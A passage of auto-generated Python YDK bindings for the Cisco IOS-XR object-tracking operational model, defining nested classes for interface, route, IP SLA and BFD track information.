self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces, [], name, value)
class InterfaceTrackingInfo(_Entity_):
"""
interface tracking info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, self).__init__()
self.yang_name = "interface-tracking-info"
self.yang_parent_name = "tracking-interaces"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracking-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/tracking-interaces/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces.InterfaceTrackingInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces']['meta_info']
class Delayed(_Entity_):
"""
Is the state change delay counter in progress
.. attribute:: time_remaining
The time remaining in seconds for the counter to trigger state change
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: track_state
State the track will transition to. Track state. True means track is up; False means track is down
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.Delayed, self).__init__()
self.yang_name = "delayed"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.time_remaining = None
self.track_state = None
self._segment_path = lambda: "delayed"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.Delayed, ['time_remaining', 'track_state'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.Delayed']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface']['meta_info']
class TrackBriefs(_Entity_):
"""
Object Tracking Track table brief
.. attribute:: track_brief
Track name \- maximum 32 characters
**type**\: list of :py:class:`TrackBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs, self).__init__()
self.yang_name = "track-briefs"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-brief", ("track_brief", ObjectTracking.TrackBriefs.TrackBrief))])
self._leafs = OrderedDict()
self.track_brief = YList(self)
self._segment_path = lambda: "track-briefs"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs, [], name, value)
class TrackBrief(_Entity_):
"""
Track name \- maximum 32 characters
.. attribute:: track_name (key)
Track name
**type**\: str
**length:** 1..32
**config**\: False
.. attribute:: track_info_brief
track info brief
**type**\: list of :py:class:`TrackInfoBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief, self).__init__()
self.yang_name = "track-brief"
self.yang_parent_name = "track-briefs"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['track_name']
self._child_classes = OrderedDict([("track-info-brief", ("track_info_brief", ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief))])
self._leafs = OrderedDict([
('track_name', (YLeaf(YType.str, 'track-name'), ['str'])),
])
self.track_name = None
self.track_info_brief = YList(self)
self._segment_path = lambda: "track-brief" + "[track-name='" + str(self.track_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-briefs/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief, ['track_name'], name, value)
class TrackInfoBrief(_Entity_):
"""
track info brief
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief, self).__init__()
self.yang_name = "track-info-brief"
self.yang_parent_name = "track-brief"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.track_type_info = ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self._segment_path = lambda: "track-info-brief"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief, ['tracke_name', 'type', 'track_state'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info-brief"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs']['meta_info']
class TrackTypeRtrReachability(_Entity_):
"""
Object Tracking Type RTR Reachability info
.. attribute:: track_info
track info
**type**\: list of :py:class:`TrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability, self).__init__()
self.yang_name = "track-type-rtr-reachability"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-info", ("track_info", ObjectTracking.TrackTypeRtrReachability.TrackInfo))])
self._leafs = OrderedDict()
self.track_info = YList(self)
self._segment_path = lambda: "track-type-rtr-reachability"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability, [], name, value)
class TrackInfo(_Entity_):
"""
track info
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo>`
**config**\: False
.. attribute:: bool_tracks
boolean objects
**type**\: :py:class:`BoolTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks>`
**config**\: False
.. attribute:: threshold_tracks
Threshold objects
**type**\: :py:class:`ThresholdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks>`
**config**\: False
.. attribute:: tracking_interaces
Tracking Interfaces
**type**\: :py:class:`TrackingInteraces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces>`
**config**\: False
.. attribute:: delayed
Is the state change delay counter in progress
**type**\: :py:class:`Delayed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.Delayed>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: state_change_counter
State Change Counter
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seconds_last_change
Seconds Last Change
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
**units**\: second
.. attribute:: threshold_up
User specified threshold upper limit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_down
User specified threshold lower limit
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo, self).__init__()
self.yang_name = "track-info"
self.yang_parent_name = "track-type-rtr-reachability"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo)), ("bool-tracks", ("bool_tracks", ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks)), ("threshold-tracks", ("threshold_tracks", ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks)), ("tracking-interaces", ("tracking_interaces", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces)), ("delayed", ("delayed", ObjectTracking.TrackTypeRtrReachability.TrackInfo.Delayed))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('state_change_counter', (YLeaf(YType.uint32, 'state-change-counter'), ['int'])),
('seconds_last_change', (YLeaf(YType.uint64, 'seconds-last-change'), ['int'])),
('threshold_up', (YLeaf(YType.uint32, 'threshold-up'), ['int'])),
('threshold_down', (YLeaf(YType.uint32, 'threshold-down'), ['int'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.state_change_counter = None
self.seconds_last_change = None
self.threshold_up = None
self.threshold_down = None
self.track_type_info = ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self.bool_tracks = ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks()
self.bool_tracks.parent = self
self._children_name_map["bool_tracks"] = "bool-tracks"
self.threshold_tracks = ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks()
self.threshold_tracks.parent = self
self._children_name_map["threshold_tracks"] = "threshold-tracks"
self.tracking_interaces = ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces()
self.tracking_interaces.parent = self
self._children_name_map["tracking_interaces"] = "tracking-interaces"
self.delayed = ObjectTracking.TrackTypeRtrReachability.TrackInfo.Delayed()
self.delayed.parent = self
self._children_name_map["delayed"] = "delayed"
self._segment_path = lambda: "track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo, ['tracke_name', 'type', 'track_state', 'state_change_counter', 'seconds_last_change', 'threshold_up', 'threshold_down'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
